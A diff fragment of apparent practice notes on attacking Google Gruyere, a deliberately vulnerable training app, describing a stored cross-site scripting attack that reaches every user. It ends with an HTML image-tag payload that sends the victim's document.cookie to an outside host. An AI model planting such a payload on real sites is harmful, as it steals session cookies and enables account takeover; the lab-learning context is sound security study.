wpendl99/.github/profile/security/practice/practice.md

 If you logout of Gruyere and create a new user account, you will see that your attack works on all users.

-Changing the background color isn't very much of an attack, but it does visually demonstrate that you are in control.
+Changing the background color isn't very much of an attack, but it does visually demonstrate that you are have taken control of the application.
 You could just have easily grabbed the user's cookie and sent it to a service endpoint where you could start collecting information on Gruyere customers.

 ```html
 <img src="null" onerror="fetch(`https://hkz.click/xss/${document.cookie}`)" />